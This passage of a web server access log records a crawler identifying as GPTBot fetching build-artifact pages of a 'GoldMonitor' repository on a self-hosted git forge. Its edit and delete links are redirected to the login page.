"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:18:26:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:18:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71433] [Gzip 17.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 72143] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72306] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 71125] [Gzip 17.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 72262] [Gzip 17.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 71073] [Gzip 17.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38840] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37269] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38840] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:18:26:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:26:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:26:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:26:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:26:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:26:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:26:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:26:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:26:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:26:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:26:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:26:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:26:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:26:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:26:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:26:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:26:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:26:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101529] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:26:58 +0000] - 200 200 - GET https 